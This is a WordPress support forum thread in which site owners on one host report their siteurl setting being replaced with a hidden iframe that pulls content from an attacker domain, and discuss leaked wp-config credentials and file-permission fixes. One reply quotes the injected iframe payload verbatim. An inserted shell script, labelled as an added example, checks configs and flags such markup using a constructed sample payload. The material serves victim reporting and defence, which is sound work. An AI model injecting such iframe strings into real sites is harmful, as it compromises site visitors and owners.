• They changed my wp-options siteurl to be an iframe pointing to networkads.net/grep

    The site was not loading correctly so I was able to find this in phpmyadmin.

    I have had a rash of hacks lately and talked to Network Solutions (my host). They tell me all of their WordPress sites are getting banged up, but their servers are clean.

    I use the bad behavior plugin with a honeypot key, and that makes me feel a little better. I also use the URL injection technique as discussed here:
    suggested by this site:
    https://perishablepress.com/press/2009/12/22/protect-wordpress-against-malicious-url-requests/

    Anyone else having problems?

Viewing 15 replies - 91 through 105 (of 150 total)
  • @gweddig I work for Network Solutions, sorry you had that experience, we are helping our customers. Please see our post https://bit.ly/bscWFQ and send us an email if you still need assistance (email is in the blog post)

    Thanks,

    Shashi

    @shashib on Twitter

    I am currently on hold with Net Sol for more than 1 hour without anyone answering. Uggggg!

    I have used the solution from one of the earlier posts where I go to wp_options and change the site URL and it still works. I recently changed all database and WP passwords and just got hacked again a little while ago with the:

    "><iframe style="display:none" height="0" width="1" src="https://mainnetsoll.com/grep/"></iframe>

    Very frustrating. I see that Net Sol only offers the suggestion of re-installing WP. I may be wrong here, but does that mean all data wiped off the server then re-uploading or just overwriting WP? Either way, won’t I be bringing residual code back in?

    On a side note, I have two WP directories running on this server. Each has its own database. When I go to Net Sol database configure area, one lets me update the user/pass and backups. The other does not. It will not let me change any of it and it gives me an error about 16 characters in my user (it is only 9 and all protocol has been followed). Does this tell anyone anything?

    After 1 hour 45 minute hold, here is what I found out. BTW, the tech was a pretty good guy and I have to admit he was helpful. In a nutshell, their stance is that we need to go back to the supported 2.9.1 version of WP instead of the 2.9.2 beta. He admitted that he was not 100% positive that this would solve it, but felt it would.

    Any thoughts on this…?

    instead of the 2.9.2 beta.

    They blew you off.

    2.9.2 is stable. The latest stable release of WordPress (Version 2.9.2)

    That’s correct, and the 2.9.2 release was actually to address a security problem in the 2.9 branch, so if anything, that’s bad advice, sorry NetSol guys, can’t support your advice there, since 2.9.0 and 2.9.1 are both open to the particular security problem that was addressed.

    Network Solutions chaps, if you feel you know something the WordPress security team does not and have information pertaining to a security problem in 2.9.2, please email any information you have along to [email protected]

    @bychow26:
    Did you notice the domain name used in that iframe?

    mainnetsoll or mainNetSoll – looks like hackers specifically target Network Solutions (NetSol).

    So WordPress reinstall is only a temporary solution. Guys at Net Sol should catch the hackers that mess with their servers.

    @shashib

    are you able to set a few dummy blogs on your host and face this problem in progress?

    If so, could you please delete the xmlrpc.php file and see how it gets secured?

    I have the exact same problem as all of you. Yesterday I changed the site url in the database, changed all of my logins and passwords, and I also made a redirection using the .htaccess file in order to have more time to understand what happened. Today when I woke up, I found that my website is online with the same problem. What I don’t understand is that I had left my site with the redirection so it should not be online today!
    Do the problems come only from the site url? I have been looking at the files and I found nothing in them.

    Good luck to all of us, I’ll be reading you!

    A little update.
    I have 2 blogs using wordpress. One of them is the 2.9.2 version and the other is the 2.9.1 version. Both of them have been hacked, the only difference is that it is almost not visible in the 2.9.1 version. The site URL has been changed in the database but nothing happens in the front end of the site and the back end is still accessible…

    Guys, you might want to look at this post:
    https://mby.me/JH

    in short:
    configuration files should only be read by Apache, but some users (well, lots of users) left it in a way that anyone could read it (755 instead of 750 in Linux slang).

    A malicious user at Network Solutions creates a script to find those configuration files that were incorrectly configured.

    This same malicious user finds hundreds of configuration files with the incorrect permissions and retrieves the database credentials

    Working on changing the permissions now... currently can’t change them as I am not root, emailing NS now.

    Forbidden
    You don’t have permission to access / on this server.

    This is N solution.

    this is also interesting:
    https://blog.unmaskparasites.com/2010/04/11/network-solutions-and-wordpress-security-flaw/

    Also, every time I try to look at the details of a plugin upgrade, I get this message:

    An Unexpected HTTP Error occurred during the API request.

    @lepensky : If you have enabled your permalinks, you cannot access your files by FTP through Network Solutions. You need to either use a FTP client or reset your permalinks to the default settings.

    so far UseShots aka @unmaskparasites stays on the top of this problem.

    Thanks, Denis!

    #Cacoline, It’s ok now.
    I have 750 on WP-config. What about the .htaccess file? What are the correct permissions?

    first
    chmod 640 wp-config.php (no need for x-ecutable)
    then change the db passwd in config to match your new wp db passwd, then fix siteurl in wp_options table in your db.

    see this and this.
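
An added example, not part of any reply in this thread: POSIX shell functions for the two checks the replies above describe, finding wp-config.php files that other accounts on a shared host can read and spotting markup in the siteurl value from wp_options. The function names, the temporary directory tree and the example domains are constructed for illustration; mode 640 is the value given in the thread and assumes the web server reads the file as its owner or as a group member.

```shell
#!/bin/sh
# Added example, not from the thread. Paths and URLs below are constructed.

# List wp-config.php files under $1 with any permission bit set for "other"
# (POSIX find: -perm -MODE is true when all bits in MODE are set).
find_exposed_configs() {
    find "$1" -type f -name wp-config.php \
        \( -perm -004 -o -perm -002 -o -perm -001 \) 2>/dev/null
}

# Apply the mode given in the thread (640) to every exposed file.
harden_configs() {
    find_exposed_configs "$1" | while IFS= read -r f; do
        chmod 640 "$f" && printf 'tightened: %s\n' "$f"
    done
}

# Return 0 only if a siteurl value is a bare http(s) URL with no markup.
# Feed it the option_value of the siteurl row in wp_options.
siteurl_is_clean() {
    case "$1" in
        *'<'*|*'>'*|*'"'*|*"'"*|*' '*) return 1 ;;
        http://?*|https://?*) return 0 ;;
        *) return 1 ;;
    esac
}

# Demo on a constructed tree and constructed siteurl values.
demo() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/blog1" "$root/blog2"
    : > "$root/blog1/wp-config.php"; chmod 755 "$root/blog1/wp-config.php"
    : > "$root/blog2/wp-config.php"; chmod 640 "$root/blog2/wp-config.php"
    echo "exposed before:"; find_exposed_configs "$root"
    harden_configs "$root"
    echo "exposed after: $(find_exposed_configs "$root" | wc -l)"
    for v in 'https://blog.example/' \
             'https://blog.example/"><iframe src="https://bad.example/">'; do
        if siteurl_is_clean "$v"; then echo "clean:    $v"
        else echo "TAMPERED: $v"; fi
    done
    rm -rf "$root"
}
demo
```

Tightening the file mode does not undo a credential leak that already happened, so the database password change and siteurl repair from the reply above still apply.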

  • The topic ‘SQL attack on wpress 2.9.2’ is closed to new replies.